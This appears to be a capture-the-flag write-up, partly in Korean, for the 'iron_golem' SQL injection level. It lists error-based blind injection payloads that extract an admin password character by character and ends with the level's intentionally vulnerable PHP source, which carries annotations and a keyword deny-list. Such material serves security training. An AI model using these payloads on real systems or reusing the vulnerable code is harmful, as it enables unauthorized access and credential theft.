?pw='or id='admin' and if(right(left(pw,29),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,29),1)='e',(select 1 union select 2),1)%23
29번째 패스워드 :e
?pw='or id='admin' and if(right(left(pw,30),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='a',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='b',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='c',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='d',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,30),1)='e',(select 1 union select 2),1)%23
30번째 패스워드 :e
?pw='or id='admin' and if(right(left(pw,31),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='9',(select 1 union select 2),1)%23
31번째 패스워드 :9
?pw='or id='admin' and if(right(left(pw,32),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='a',(select 1 union select 2),1)%23
32번째 패스워드 :a
pw :06b5a6c16e8830475f983cc3a825ee9a

query : select id from prob_iron_golem where id='admin' and pw='06b5a6c16e8830475f983cc3a825ee9a'

 

IRON_GOLEM Clear!


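<?php
  // Full source of the "iron_golem" level as shown after it is cleared.
  // The code is intentionally vulnerable; comments mark what a real
  // application should do differently.
  // NOTE: $_GET[pw] (unquoted key) is kept as the challenge wrote it.
  include "./config.php";
  login_chk();
  $db = dbconnect();

  // Keyword deny-list ("prob", "_", ".", "()", sleep, benchmark). Filtering
  // keywords does not stop injection, because quotes and conditional
  // expressions are still accepted.
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");

  // User input is concatenated into the SQL string: this is the injection
  // point. Use a prepared statement and bind pw as a parameter.
  $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));

  // Returning mysqli_error() to the client exposes whether the query failed,
  // which is the signal this level is built around. Production code should
  // log the error and show a generic message.
  if(mysqli_error($db)) exit(mysqli_error($db));

  // $query contains user input and is printed without HTML escaping
  // (htmlspecialchars() would be needed here).
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  // Verification step: input is escaped with addslashes() and must equal the
  // stored pw exactly before solve() is called.
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");

  highlight_file(__FILE__);
?>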